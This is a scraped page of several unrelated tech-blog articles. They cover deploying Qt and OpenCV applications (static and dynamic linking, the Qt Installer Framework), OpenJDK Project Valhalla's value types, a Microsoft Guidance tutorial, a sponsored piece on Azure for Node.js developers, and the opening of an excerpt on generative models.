In this article, we saw how the NGINX configuration file is built. Its modular nature is a reflection, in part, of the modularity of NGINX itself. A global configuration block is responsible for all aspects that affect the running of NGINX as a whole. There is a separate configuration section for each protocol that NGINX is responsible for handling. We may further define how each request is to be handled by specifying servers within those protocol configuration contexts (either http or mail) so that requests are routed to a specific IP address/port. Within the http context, locations are then used to match the URI of the request.
These locations may be nested, or otherwise ordered, to ensure that requests get routed to the right areas of the filesystem or application server.

Gebin George
02 Apr 2018
16 min read

3 ways to deploy a QT and OpenCV application

[box type="note" align="" class="" width=""]This article is an excerpt from the book, Computer Vision with OpenCV 3 and Qt5, written by Amin Ahmadi Tazehkandi. This book covers how to build, test, and deploy Qt and OpenCV apps, either dynamically or statically.[/box]

Today, we will learn three different methods to deploy a Qt + OpenCV application. It is extremely important to provide the end users with an application package that contains everything it needs to be able to run on the target platform, and that demands very little or no effort at all from the users in terms of taking care of the required dependencies. Achieving this kind of works-out-of-the-box condition for an application relies mostly on the type of linking (dynamic or static) that is used to create the application, and also on the specifications of the target operating system.

Deploying using static linking

Deploying an application statically means that your application will run on its own, and it eliminates having to take care of almost all of the needed dependencies, since they are already inside the executable itself. It is enough to simply make sure you select the Release mode while building your application, as seen in the following screenshot:

When your application is built in the Release mode, you can simply pick up the produced executable file and ship it to your users. If you try to deploy your application to Windows users, you might face an error similar to the following when your application is executed:

The reason for this error is that on Windows, even when building your Qt application statically, you still need to make sure that the Visual C++ Redistributables exist on the target system. This is required for C++ applications that are built by using Microsoft Visual C++, and the version of the required redistributables corresponds to the Microsoft Visual Studio installed on your computer.
In our case, the official title of the installer for these libraries is Visual C++ Redistributables for Visual Studio 2015, and it can be downloaded from the following link: https://www.microsoft.com/en-us/download/details.aspx?id=48145

It is a common practice to include the redistributables installer inside the installer for our application and perform a silent installation of them if they are not already installed. This process happens with most of the applications you use on your Windows PCs, most of the time without you even noticing it.

We already quite briefly talked about the advantages (fewer files to deploy) and disadvantages (bigger executable size) of static linking. But when it is meant in the context of deployment, there are some more complexities that need to be considered. So, here is another (more complete) list of disadvantages when using static linking to deploy your applications:

The building takes more time and the executable size gets bigger and bigger.
You can't mix static and shared (dynamic) Qt libraries, which means you can't use the power of plugins and extend your application without building everything from scratch.
Static linking, in a sense, means hiding the libraries used to build an application. Unfortunately, this option is not offered with all libraries, and failing to comply with it can lead to licensing issues with your application. This complexity arises partly from the fact that the Qt Framework uses some third-party libraries that do not offer the same set of licensing options as Qt itself. Talking about licensing issues is not a discussion suitable for this book, so we'll suffice with mentioning that you must be careful when you plan to create commercial applications using static linking of Qt libraries.
For a detailed list of licenses used by third-party libraries within Qt, you can always refer to the Licenses Used in Qt web page at the following link: http://doc.qt.io/qt-5/licenses-used-in-qt.html

Static linking, even with all of the disadvantages we just mentioned, is still an option, and a good one in some cases, provided that you can comply with the licensing options of the Qt Framework. For instance, on Linux operating systems, where creating an installer for our application requires some extra work and care, static linking can greatly reduce the effort needed to deploy applications (merely a copy and paste). So, the final decision of whether to use static linking or not is mostly up to you and how you plan to deploy your application. Making this important decision will be much easier by the end of this chapter, when you have an overview of the possible linking and deployment methods.

Deploying using dynamic linking

When you deploy an application built with Qt and OpenCV using shared libraries (or dynamic linking), you need to make sure that the executable of your application is able to reach the runtime libraries of Qt and OpenCV, in order to load and use them. This reachability or visibility of runtime libraries can have different meanings depending on the operating system. For instance, on Windows, you need to copy the runtime libraries to the same folder where your application executable resides, or put them in a folder that is appended to the PATH environment variable. The Qt Framework offers command-line tools to simplify the deployment of Qt applications on Windows and macOS. As mentioned before, the first thing you need to do is to make sure your application is built in the Release mode, and not the Debug mode.
Then, if you are on Windows, first copy the executable (let us assume it is called app.exe) from the build folder into a separate folder (which we will refer to as deploy_path) and execute the following commands using a command-line instance:

cd deploy_path
QT_PATH\bin\windeployqt app.exe

The windeployqt tool is a deployment helper tool that simplifies the process of copying the required Qt runtime libraries into the same folder as the application executable. It simply takes an executable as a parameter and, after determining the modules used to create it, copies all required runtime libraries and any additional required dependencies, such as Qt plugins, translations, and so on.

This takes care of all the required Qt runtime libraries, but we still need to take care of the OpenCV runtime libraries. If you followed all of the steps in Chapter 1, Introduction to OpenCV and Qt, for building OpenCV libraries dynamically, then you only need to manually copy the opencv_world330.dll and opencv_ffmpeg330.dll files from the OpenCV installation folder (inside the x86\vc14\bin folder) into the same folder where your application executable resides.

We didn't really go into the benefits of turning on the BUILD_opencv_world option when we built OpenCV in the early chapters of the book; however, it should be clear now that this simplifies the deployment and usage of the OpenCV libraries, by requiring only a single entry for LIBS in the *.pro file and manually copying only a single file (not counting the ffmpeg library) when deploying OpenCV applications. It should also be noted that this method has the disadvantage of copying all OpenCV code (in a single library) along with your application, even when you do not need or use all of its modules in a project. Also note that on Windows, as mentioned in the Deploying using static linking section, you still need to similarly provide the end users of your application with the Microsoft Visual C++ Redistributables.
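As an informal sketch, the manual OpenCV copy step above can be scripted (for example, from a Git Bash or MSYS shell on Windows). The copy_opencv_runtime helper below is illustrative, not a tool provided by Qt or OpenCV; the DLL names follow the build described in the text:

```shell
# Sketch: copy the OpenCV runtime libraries next to the application
# executable so that Windows can resolve them at startup.
copy_opencv_runtime() {
    opencv_bin="$1"    # e.g. the OpenCV folder ending in x86/vc14/bin
    deploy_path="$2"   # folder that already holds app.exe
    for dll in opencv_world330.dll opencv_ffmpeg330.dll; do
        # fail early if either library is missing from the build folder
        cp "$opencv_bin/$dll" "$deploy_path/" || return 1
    done
}
```

Called as, for example, copy_opencv_runtime /c/opencv/build/x86/vc14/bin deploy_path, it mirrors the manual step described above; run it after windeployqt has filled the same folder.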
On the macOS operating system, it is also possible to easily deploy applications written using the Qt Framework. For this, you can use the macdeployqt command-line tool provided by Qt. Similar to windeployqt, which accepts a Windows executable and fills the same folder with the required libraries, macdeployqt accepts a macOS application bundle and makes it deployable by copying all of the required Qt runtimes as private frameworks inside the bundle itself. Here is an example:

cd deploy_path
QT_PATH/bin/macdeployqt my_app_bundle

Optionally, you can also provide an additional -dmg parameter, which leads to the creation of a macOS *.dmg (disk image) file. As for the deployment of OpenCV libraries when dynamic linking is used, you can create an installer using the Qt Installer Framework (which we will learn about in the next section), a third-party provider, or a script that makes sure the required runtime libraries are copied to their required folders. This is because simply copying your runtime libraries (whether OpenCV or anything else) to the same folder as the application executable does not make them visible to an application on macOS. The same also applies to the Linux operating system, where unfortunately a tool for deploying Qt runtime libraries does not exist (at least for the moment), so we also need to take care of the Qt libraries in addition to the OpenCV libraries, either by using a trusted third-party provider (which you can search for online) or by using the cross-platform installer provided by Qt itself, combined with some scripting to make sure everything is in place when our application is executed.

Deploy using Qt Installer Framework

The Qt Installer Framework allows you to create cross-platform installers of your Qt applications for the Windows, macOS, and Linux operating systems.
It allows for creating standard installer wizards, where the user is taken through consecutive dialogs that provide all the necessary information and finally display the progress while the application is being installed, similar to most of the installations you have probably faced, and especially the installation of the Qt Framework itself. The Qt Installer Framework is based on the Qt Framework itself, but is provided as a separate package and does not require the Qt SDK (Qt Framework, Qt Creator, and so on) to be present on a computer. It is also possible to use the Qt Installer Framework to create installer packages for any application, not just Qt applications.

In this section, we are going to learn how to create a basic installer using the Qt Installer Framework, which takes care of installing your application on a target computer and copying all the necessary dependencies. The result will be a single executable installer file that you can put on a web server to be downloaded, or provide on a USB stick, a CD, or any other media type. This example project will help you get started with working your way around the many great capabilities of the Qt Installer Framework by yourself.

You can use the following link to download and install the Qt Installer Framework. Make sure to simply download the latest version, whether you use this link or any other source for downloading it. At the moment, the latest version is 3.0.2: https://download.qt.io/official_releases/qt-installer-framework

After you have downloaded and installed the Qt Installer Framework, you can start creating the required files that it needs in order to create an installer. You can do this by simply browsing to the Qt Installer Framework and, from the examples folder, copying the tutorial folder, which is also a template in case you want to quickly rename and re-edit all of the files and create your installer quickly.
We will go the other way and create them manually; first, because we want to understand the structure of the required files and folders for the Qt Installer Framework, and second, because it is still quite easy and simple. Here are the required steps for creating an installer:

Assuming that you have already finished developing your Qt and OpenCV application, start by creating a new folder that will contain the installer files. Let's assume this folder is called deploy.

Create an XML file inside the deploy folder and name it config.xml. This XML file must contain the following:

<?xml version="1.0" encoding="UTF-8"?>
<Installer>
    <Name>Your application</Name>
    <Version>1.0.0</Version>
    <Title>Your application Installer</Title>
    <Publisher>Your vendor</Publisher>
    <StartMenuDir>Super App</StartMenuDir>
    <TargetDir>@HomeDir@/InstallationDirectory</TargetDir>
</Installer>

Make sure to replace the required XML fields in the preceding code with information relevant to your application, and then save and close this file.

Now, create a folder named packages inside the deploy folder. This folder will contain the individual packages that you want the user to be able to install, or make them mandatory or optional so that the user can review and decide what will be installed.

In the case of simpler Windows applications written using Qt and OpenCV, it is usually enough to have just a single package that includes the required files to run your application, and even performs a silent installation of the Microsoft Visual C++ Redistributables. But for more complex cases, and especially when you want to have more control over the individual installable elements of your application, you can also go for two or more packages, or even sub-packages. This is done by using domain-like folder names for each package. Each package folder can have a name like com.vendor.product, where vendor and product are replaced by the developer name or company and the application.
A sub-package (or sub-component) of a package can be identified by adding .subproduct to the name of the parent package. For instance, you can have the following folders inside the packages folder:

com.vendor.product
com.vendor.product.subproduct1
com.vendor.product.subproduct2
com.vendor.product.subproduct1.subsubproduct1
…

This can go on for as many products (packages) and sub-products (sub-packages) as we like. For our example case, let's create a single folder that contains our executable, since that describes it all, and you can create additional packages by simply adding them to the packages folder. Let's name it something like com.amin.qtcvapp. Now, follow these required steps:

Create two folders inside the new package folder (com.amin.qtcvapp) and rename them to data and meta. These two folders must exist inside all packages.

Copy your application files into the data folder. This folder will be extracted into the target folder exactly as it is (we will talk about setting the target folder of a package in the later steps). In case you are planning to create more than one package, make sure to separate their data correctly and in a way that makes sense. Of course, you won't face any errors if you fail to do so, but the users of your application will probably be confused, for instance by skipping a package that should be installed at all times and ending up with an installed application that does not work.

Now, switch to the meta folder, create the following two files inside that folder, and fill them with the code provided for each one of them. The package.xml file should contain the following.
There's no need to mention that you must fill the fields inside the XML with values relevant to your package:

<?xml version="1.0" encoding="UTF-8"?>
<Package>
    <DisplayName>The component</DisplayName>
    <Description>Install this component.</Description>
    <Version>1.0.0</Version>
    <ReleaseDate>1984-09-16</ReleaseDate>
    <Default>script</Default>
    <Script>installscript.qs</Script>
</Package>

The script in the previous XML file, which is probably the most important part of the creation of an installer, refers to a Qt Installer Script (*.qs file), named installscript.qs, which can be used to further customize the package, its target folder, and so on. So, let us create a file with the same name (installscript.qs) inside the meta folder, and use the following code inside it:

function Component()
{
    // initializations go here
}

Component.prototype.isDefault = function()
{
    // select (true) or unselect (false) the component by default
    return true;
}

Component.prototype.createOperations = function()
{
    try {
        // call the base create operations function
        component.createOperations();
    } catch (e) {
        console.log(e);
    }
}

This is the most basic component script, which customizes our package (well, it only performs the default actions), and it can optionally be extended to change the target folder, create shortcuts in the Start menu or desktop (on Windows), and so on. It is a good idea to keep an eye on the Qt Installer Framework documentation and learn about its scripting to be able to create more powerful installers that can put all of the required dependencies of your app in place, automatically. You can also browse through all of the examples inside the examples folder of the Qt Installer Framework and learn how to deal with different deployment cases. For instance, you can try to create individual packages for the Qt and OpenCV dependencies and allow the users to deselect them, in case they already have the Qt runtime libraries on their computer.
The last step is to use the binarycreator tool to create our single and standalone installer. Simply run the following command using a Command Prompt (or Terminal) instance:

binarycreator -p packages -c config.xml myinstaller

The binarycreator tool is located inside the Qt Installer Framework bin folder. It requires two parameters that we have already prepared: -p must be followed by our packages folder, and -c must be followed by the configuration file (config.xml). After executing this command, you will get myinstaller (on Windows, you can append *.exe to it), which you can execute to install your application. This single file contains all of the required files needed to run your application, and the rest is taken care of. You only need to provide a download link to this file, or provide it on a CD to your users. The following are the dialogs you will face in this default and most basic installer, which contains most of the usual dialogs you would expect when installing an application:

If you go to the installation folder, you will notice that it contains a few more files than you put inside the data folder of your package. Those files are required by the installer to handle modifications and uninstall your application. For instance, the users of your application can easily uninstall it by executing the maintenance tool executable, which produces another simple and user-friendly dialog to handle the uninstall process:

We saw how to deploy Qt + OpenCV applications using static linking, dynamic linking, and the Qt Installer Framework. If you found our post useful, do check out the book Computer Vision with OpenCV 3 and Qt5 to accentuate your OpenCV applications by developing them with Qt.
Bhagyashree R
10 Dec 2019
4 min read

OpenJDK Project Valhalla’s head shares how they plan to enhance the Java language and JVM with value types, and more

Announced in 2014, Project Valhalla is an experimental OpenJDK project to bring major new language features to Java 10 and beyond. It primarily focuses on enabling developers to create and utilize value types, or non-reference values. Last week, the project's head, Brian Goetz, shared the goal, motivation, current status, and other details about the project in a set of documents called "State of Valhalla".

Goetz shared that in the span of five years, the team has come up with five distinct prototypes of the project. Sharing the current state of the project, he wrote, "We believe we are now at the point where we have a clear and coherent path to enhance the Java language and virtual machine with value types, have them interoperate cleanly with existing generics, and have a compatible path for migrating our existing value-based classes to inline classes and our existing generic classes to specialized generics."

The motivation behind Project Valhalla

One of the main motivations behind Project Valhalla was adapting the Java language and runtime to modern hardware. It has been almost 25 years since Java was introduced, and a lot has changed since then. At that time, the cost of a memory fetch and an arithmetic operation was roughly the same, but this is not the case now: today, memory fetch operations are 200 to 1,000 times more expensive than arithmetic operations. Java is often considered a pointer-heavy language, as most Java data structures in an application are objects or reference types. This is why Project Valhalla aims to introduce value types, to get rid of this overhead both in memory and in computation.
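The cost gap described above shows up in the shape of everyday Java code: with today's identity classes, an array of points is an array of references into separately allocated objects, while primitive arrays are laid out flat and dense. The following sketch in standard Java illustrates the two layouts (the class and method names are ours, not from the project):

```java
// Pointer-heavy vs. flat data layout: the motivation behind value types.
// An array of Point objects stores references; each element access is a
// pointer dereference into a separately allocated heap object. Two
// parallel primitive arrays hold the same data contiguously.
public class LayoutDemo {
    static final class Point {          // identity class: heap-allocated
        final int x, y;
        Point(int x, int y) { this.x = x; this.y = y; }
    }

    // Sums x + y over an array of boxed points (one indirection per element).
    static long sumBoxed(Point[] pts) {
        long s = 0;
        for (Point p : pts) s += p.x + p.y;
        return s;
    }

    // The same computation over flat primitive arrays (no indirection).
    static long sumFlat(int[] xs, int[] ys) {
        long s = 0;
        for (int i = 0; i < xs.length; i++) s += xs[i] + ys[i];
        return s;
    }

    public static void main(String[] args) {
        int n = 4;
        Point[] boxed = new Point[n];
        int[] xs = new int[n], ys = new int[n];
        for (int i = 0; i < n; i++) {
            boxed[i] = new Point(i, i * 2);
            xs[i] = i;
            ys[i] = i * 2;
        }
        // Both layouts encode the same data; only the memory shape differs.
        System.out.println(sumBoxed(boxed) == sumFlat(xs, ys)); // prints "true"
    }
}
```

Value types aim to give code written in the first style the memory behavior of the second.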
Goetz wrote, "We aim to give developers the control to match data layouts with the performance model of today's hardware, providing Java developers with an easier path to flat (cache-efficient) and dense (memory-efficient) data layouts without compromising abstraction or type safety."

The language model for incorporating inline types

Goetz further talked about how the team is accommodating inline classes in the language type system. He wrote, "The motto for inline classes is: codes like a class, works like an int; the latter part of this motto means that inline types should align with the behaviors of primitive types outlined so far." This means that inline classes will enable developers to write types that behave more like Java's built-in primitive types. Inline classes are similar to current classes in the sense that they can have properties, methods, constructors, and so on. However, the difference that Project Valhalla brings is that instances of inline classes, or inline objects, do not have identity, the property that distinguishes them from other objects. This is why operations that are identity-sensitive, like synchronization, are not possible with inline objects.

There are a bunch of other differences between inline and identity classes. Goetz wrote, "Object identity serves, among other things, to enable mutability and layout polymorphism; by giving up identity, inline classes must give up these things. Accordingly, inline classes are implicitly final, cannot extend any other class besides Object...and their fields are implicitly final." In Project Valhalla, types are divided into inline and reference types, where inline types include primitives, and reference types are those that are not inline types, such as declared identity classes, declared interfaces, array types, and so on. He further listed a few migration scenarios, including value-based classes, primitives, and specialized generics.
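Inline classes themselves require a Valhalla build of the JDK, but the discipline Goetz describes (implicitly final, final fields, state-based rather than identity-based equality) can be approximated today with a hand-written value-based class. The Complex class below is an illustrative sketch in standard Java, not Valhalla syntax:

```java
// A value-based class in today's Java: final, all-final fields, and
// equals/hashCode defined purely by state. This is the discipline an
// inline class would enforce automatically (minus the flat layout).
public final class Complex {
    private final double re, im;

    public Complex(double re, double im) { this.re = re; this.im = im; }

    // No mutation: arithmetic returns a new value instead of changing this one.
    public Complex plus(Complex other) {
        return new Complex(re + other.re, im + other.im);
    }

    @Override public boolean equals(Object o) {
        if (!(o instanceof Complex)) return false;
        Complex c = (Complex) o;
        return re == c.re && im == c.im;   // state-based, not identity-based
    }

    @Override public int hashCode() {
        return java.util.Objects.hash(re, im);
    }

    public static void main(String[] args) {
        Complex a = new Complex(1, 2);
        Complex b = new Complex(1, 2);
        // Equal by state, yet still two distinct identities in today's Java.
        System.out.println(a.equals(b) && a != b); // prints "true"
    }
}
```

Under Valhalla, an inline version of such a class would drop the identity entirely, which is what makes the flat, dense layout possible.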
Check out Goetz’s post to know more in detail about the Project Valhalla. OpenJDK Project Valhalla is ready for developers working in building data structures or compiler runtime libraries OpenJDK Project Valhalla’s LW2 early access builds are now available for you to test OpenJDK Project Valhalla is now in Phase III

article-image-getting-started-with-microsoft-guidance
Prakhar Mishra
28 Feb 2024
8 min read

Getting Started with Microsoft Guidance

Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights and books. Don't miss out – sign up today!

Introduction

The emergence of massive language models is a watershed moment in the field of artificial intelligence (AI) and natural language processing (NLP). Because of their extraordinary capacity to write human-like text and perform a range of language-related tasks, these models, which are based on deep learning techniques, have earned considerable interest and acceptance. This field has undergone significant scientific developments in recent years, and researchers all over the world have been developing better and more domain-specific LLMs to meet the needs of various use cases.

Large Language Models (LLMs) such as GPT-3 and its descendants, like any technology or strategy, have downsides and limits, and in order to use LLMs properly, ethically, and to their maximum capacity, it is critical to grasp those downsides and limitations. Unlike large language models such as GPT-4, which can follow the majority of instructions, language models that are not as large (such as GPT-2, LLaMa, and their derivatives) frequently fail to follow instructions adequately, particularly the part of an instruction that asks for output in a specific structure. This causes a bottleneck when constructing a pipeline in which the output of LLMs is fed to other downstream functions.

Introducing Guidance - an effective and efficient means of controlling modern language models compared to conventional prompting methods. It supports both open LLMs (LLaMa, GPT-2, Alpaca, and so on) and closed LLMs (ChatGPT, GPT-4, and so on). It can be considered part of a larger ecosystem of tools for expanding the capabilities of language models.

Guidance uses Handlebars, a templating language. Handlebars allows us to build semantic templates effectively by compiling templates into JavaScript functions, which makes execution faster than in many other templating engines. Guidance also integrates well with Jsonformer, a bulletproof way to generate structured JSON from language models. Here's a detailed notebook on the same. Also, in case you were to use OpenAI from Azure AI, then Guidance has you covered - notebook.

Moving on to some of the outstanding features that Guidance offers; feel free to check out the entire list of features.

Features

1. Guidance Acceleration - This addition significantly improves inference performance by efficiently utilizing the key/value caches as we proceed through the prompt, keeping a session state with the LLM inference. Benchmarking revealed a 50% reduction in runtime when compared to standard prompting approaches. Here's the link to one of the benchmarking exercises. The below image shows an example of generating a character profile of an RPG game in JSON format. The green highlights are the generations done by the model, whereas the blue and unhighlighted parts are copied as is from the input prompt, unlike the traditional method that tries to generate every bit of it. Source

Note: As of now, the Guidance Acceleration feature is implemented for open LLMs. We can soon expect to see it working with closed LLMs as well.

2. Token Healing - This feature attempts to correct tokenization artifacts that commonly occur at the border between the end of a prompt and the start of a group of generated tokens. For example, if we ask an LLM to auto-complete a URL with the below-mentioned input, it is likely to produce the shown output. Apart from the obvious limitation that the URL might not be valid, I'd like to draw your attention to the extra space it creates (highlighted in red).
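The backtracking idea behind token healing can be sketched in a few lines of Python. This is a toy: the mini-vocabulary and greedy matcher below are made up for illustration, and the real implementation operates on the model's actual tokenizer.

```python
# Toy sketch of token healing: back up over the last prompt token so the
# model can regenerate it merged with what follows (e.g. ':' + '//' can
# become the single token '://'). The vocabulary below is hypothetical.
VOCAB = ["The", " link", " is", " <a", " href", "=", "http", ":", "://", "www", ".google.com"]

def tokenize(text):
    """Greedy longest-match tokenization over the toy vocabulary."""
    tokens = []
    while text:
        match = max((t for t in VOCAB if text.startswith(t)), key=len, default=None)
        if match is None:
            raise ValueError(f"untokenizable text: {text!r}")
        tokens.append(match)
        text = text[len(match):]
    return tokens

def heal_prompt(prompt):
    """Drop the last token from the prompt and return it as a constraint:
    generation must re-start with this text, but may extend it into a
    longer token such as '://'."""
    tokens = tokenize(prompt)
    return "".join(tokens[:-1]), tokens[-1]

healed, prefix = heal_prompt("The link is <a href=http:")
print(healed, "| generation must continue with:", prefix)
```

With the prompt backed up to `http` and the constraint that generation must re-start with `:`, the model is free to emit `://` as a single token instead of being forced to continue after a bare `:`, which is exactly the failure the URL example below demonstrates.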
Such considerations make it difficult to construct a dependable parsing function and robustly absorb its result into subsequent phases.

Input: "The link is <a href=http:"
Actual Output: "The link is <a href=http: //www.google.com/search?q"
Expected Output: "The link is <a href=http://www.google.com/search?q"

This is the exact bucket of problems that Token Healing tries to solve using the backtracking method. Feel free to check out this jupyter notebook for more examples.

3. Guaranteed Output Structure - Large language models are fantastic at producing useful outputs, but not so much at producing outputs in a specified format (especially open-source ones like LLaMa, GPT-2, and so on). When we want to use the output of a language model as input to another system, this is frequently an issue. With Handlebars, Guidance guarantees that the output format will be the same as what was asked for.

Let's now see Guidance in action.

Installation

Installing Guidance is a breeze; just do a pip install:

$ pip install guidance

Assume we are now creating a product description for an e-commerce website. Here's how traditional generation compares to Guidance generation. Feel free to play with this colab notebook with both the below examples.

Traditional Generation

Input:

Consider you are an e-commerce expert. You need to write a product description for a product to be listed on the e-commerce website. The product description consists of a fixed set of fields to be filled in the JSON. The below shown JSON is the structure of the description with constraints for each of the attributes enclosed within < > brackets. Please follow the mentioned constraint and format diligently.
{
  prod_id: <numeric value of 5 digits>,
  prod_name: <name starts with the prefix 'p_'>,
  prod_price: <should be an integer between 1 and 16. Should end with suffix '$'>
}
The product description is

Output:

Consider you are an e-commerce expert.
You need to write a product description for a product to be listed on the e-commerce website. The product description consists of a fixed set of fields to be filled in the JSON. The below shown JSON is the structure of the description with constraints for each of the attributes enclosed within < > brackets. Please follow the mentioned constraint and format diligently.
{
  prod_id: <numeric value of 5 digits>,
  prod_name: <name starts with the prefix 'p_'>,
  prod_price: <should be an integer between 1 and 16. Should end with suffix '$'>
}
The product description is { resentprod_id: <numeric value of 5 digits>, resentprod_name: <name begins with the prefix 'p_'>, resentprod_price: <should be an integer between 1 and 16. Should end with suffix '$'> } In the above example, the product description has 5 constraint fields and 5 attribute fields. The constraints are as follows: resentprod_id: - value of 5 digits, resentprod_name: - name of the product, resentprod_price: - price of the product, resentprod_price_suffix: - suffix of the product price, resentprod_id: - the product id, resentpro diabetic_id: value of 4 digits, resentprod_ astronomer_id: - value of 4 digits, resentprod_ star_id: - value of 4 digits, resentprod_is_generic: - if the product is generic and not the generic type, resentprod_type: - the type of the product, resentprod_is_generic_type

Note how the model simply echoes a mangled version of the schema instead of filling it in.

Here's the code for the above example with the GPT-2 language model (`Input` holds the prompt shown above):

```
from transformers import AutoModelForCausalLM, AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("gpt2-large")
model = AutoModelForCausalLM.from_pretrained("gpt2-large")

inputs = tokenizer(Input, return_tensors="pt")
tokens = model.generate(
    **inputs,
    max_new_tokens=256,
    temperature=0.7,
    do_sample=True,
)

# Output:
print(tokenizer.decode(tokens[0], skip_special_tokens=True))
```

Guidance Generation

Input w/ code:

guidance.llm = guidance.llms.Transformers("gpt2-large")
# define the prompt
program = guidance("""Consider you are an e-commerce expert.
You need to write a product description for a product to be listed on the e-commerce website. The product description consists of a fixed set of fields to be filled in the JSON. The following is the format
```json
{
  "prod_id": "{{gen 'id' pattern='[0-9]{5}' stop=','}}",
  "prod_name": "{{gen 'name' pattern='p_[A-Za-z]+' stop=','}}",
  "prod_price": "{{gen 'price' pattern='\b([1-9]|1[0-6])\b\$' stop=','}}"
}
```
""")

# execute the prompt
Output = program()

Output:

Consider you are an e-commerce expert. You need to write a product description for a product to be listed on the e-commerce website. The product description consists of a fixed set of fields to be filled in the JSON. The following is the format
```json
{
  "prod_id": "11231",
  "prod_name": "p_pizzas",
  "prod_price": "11$"
}
```

As seen in the preceding instances, with Guidance we can be certain that the output format will be followed within the given restrictions, no matter how many times we execute the identical prompt. This capability makes it an excellent choice for constructing any dependable and robust multi-step LLM pipeline.

I hope this overview of Guidance has helped you realize the value it may provide to your daily prompt development cycle. Also, here's a consolidated notebook showcasing all the features of Guidance; feel free to check it out.

Author Bio

Prakhar has a Master's in Data Science with over 4 years of experience in industry across various sectors like Retail, Healthcare, Consumer Analytics, etc. His research interests include Natural Language Understanding and generation, and he has published multiple research papers in reputed international publications in the relevant domain. Feel free to reach out to him on LinkedIn.

article-image-5-reasons-node-js-developers-might-actually-love-using-azure-sponsored-by-microsoft
Richard Gall
24 May 2019
6 min read

5 reasons Node.js developers might actually love using Azure [Sponsored by Microsoft]

If you're a Node.js developer, it might seem odd to be thinking about Azure. However, as the software landscape becomes increasingly cloud native, it's well worth thinking about the cloud solution you and your organization use. It should, after all, make life easier for you as much as it should help your company scale and provide better services and user experiences for customers.

We don't often talk about it, but cloud isn't one thing: it's a set of tools that provide developers with new ways of building and managing apps. It helps you experiment and learn. In the development of Azure, developer experience is at the top of the agenda. In many ways the platform represents Microsoft's transformation as an organization, from one that seemed to distrust open source developers, to one which is hell bent on making them happier and more productive.

So, if you're a Node.js developer - or any kind of JavaScript developer, for that matter - reading this with healthy scepticism (and why wouldn't you), let's look at some of the reasons and ways Azure can support you in your work...

This post is part of a series brought to you in conjunction with Microsoft. Download Learning Node.js Development for free courtesy of Microsoft here.

Deploy apps quickly with Azure App Service

As a developer, deploying applications quickly is one of your top priorities. Azure enables that with Azure App Service. Essentially, Azure App Service is a PaaS that brings together a variety of other Azure services and resources, helping you to develop and host applications without worrying about your infrastructure. There are lots of reasons to love Azure App Service, not least the speed with which it allows you to get up and running, but most importantly it gives application developers access to a range of Azure features, such as load balancing and security, as well as the platform's integrations with tools for DevOps processes. Azure App Service works for developers working with a range of platforms, from Python to PHP - Node.js developers that want to give it a try should start here.

Manage application and infrastructure resources with the Azure CLI

The Azure CLI is a useful tool for managing cloud resources. It can also be used to deploy an application quickly. If you're a developer that likes working with the CLI, this feature really does offer a nice way of working, allowing you to easily move between each step in the development and deployment process. If you want to try deploying a Node.js application using the Azure CLI, check out this tutorial, or learn more about the Azure CLI here.

Go serverless with Azure Functions

Serverless has been getting serious attention over the last 18 months. While it's true that serverless is a hyped field, and that in reality there are serious considerations to be made about how and where you choose to run your software, it's relatively easy to try it out for yourself using Azure. In fact, the name itself is useful in demystifying serverless: the word 'functions' is a much more accurate description of what you're doing as a developer. A function is essentially a small piece of code that runs in the cloud and executes certain actions or tasks in specific situations. There are many reasons to go serverless, from a pay-per-use pricing model to support for your preferred dependencies. And while there are plenty of options in terms of cloud providers, Azure is worth exploring because it makes it so easy for developers to leverage. Learn more about Azure Functions here.

Simple, accessible dashboards for logging and monitoring

In 2019, building more reliable and observable systems will expand from the preserve of SREs and become something developers are accountable for too. This is the next step in the evolution of software engineering, as new silos are broken down. It's for this reason that the monitoring tools offered by Azure could prove to be so valuable for developers. With Application Insights and Azure Monitor, you can gain the level of transparency you need to properly manage your application. Learn how to successfully monitor a Node.js app here.

Build and deploy applications with Azure DevOps

DevOps shouldn't really require additional effort and thinking - but more often than not it does. Azure is a platform that appears to understand this implicitly, and the team behind it has done a lot to make it easier to cultivate a DevOps culture with several useful tools and integrations. Azure Test Plans is a toolkit for testing applications, which can seriously help you improve the way you test in your development processes, while Azure Boards can support project management from inside the Azure ecosystem - useful if you're looking for a new way to manage agile workflows. But perhaps the most important feature within Azure DevOps - for developers at least - is Azure Pipelines. Azure Pipelines is particularly useful for JavaScript developers, as it gives you the option to run a build pipeline on a Microsoft-hosted agent that has a wide range of common JavaScript tools (like Yarn and Gulp) pre-installed. Microsoft claims this is the "simplest way to build and deploy" because "maintenance and upgrades are taken care of for you. Each time you run a pipeline, you get a fresh virtual machine. The virtual machine is discarded after one use." Find out how to build, test, and deploy Node.js apps using Azure Pipelines with this tutorial.

Read next: 5 developers explain why they use Visual Studio Code

Conclusion: Azure is a place to experiment and learn

We often talk about cloud as a solution or service. And although it can provide solutions to many urgent problems, it's worth remembering that cloud is really a set of many different tools. It isn't one thing. Because of this, cloud platforms like Azure are as much places to experiment and try out new ways of working as they are simply someone else's server space. With that in mind, it could be worth experimenting with Azure to try out new ideas - after all, what's the worst that can happen? More than anything, cloud native should make development fun. Find out how to get started with Node.js on Azure. Download Learning Node.js with Azure for free from Microsoft.

article-image-getting-know-generative-models-types
Sunith Shetty
20 Feb 2018
9 min read

Getting to know Generative Models and their types

[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Rajdeep Dua and Manpreet Singh Ghotra titled Neural Network Programming with Tensorflow. In this book, you will use TensorFlow to build and train neural networks of varying complexities, without any hassle.[/box]

In today's tutorial, we will learn about generative models and their types. We will also look into how discriminative models differ from generative models.

Introduction to Generative models

Generative models are the family of machine learning models that are used to describe how data is generated. To train a generative model, we first accumulate a vast amount of data in some domain and later train a model to create or generate data like it. In other words, these are models that can learn to create data that is similar to the data we give them. One such approach is using Generative Adversarial Networks (GANs).

There are two kinds of machine learning models: generative models and discriminative models. Let's examine the following list of classifiers: decision trees, neural networks, random forests, generalized boosted models, logistic regression, Naive Bayes, and Support Vector Machine (SVM). Most of these are classifiers and ensemble models. The odd one out here is Naive Bayes: it's the only generative model in the list. The others are examples of discriminative models. The fundamental difference between generative and discriminative models lies in the underlying probability inference structure. Let's go through some of the key differences between generative and discriminative models.

Discriminative versus generative models

Discriminative models learn P(Y|X), which is the conditional relationship between the target variable Y and features X. This is how least squares regression works, and it is the kind of inference pattern that gets used: an approach to sorting out the relationship among variables directly.
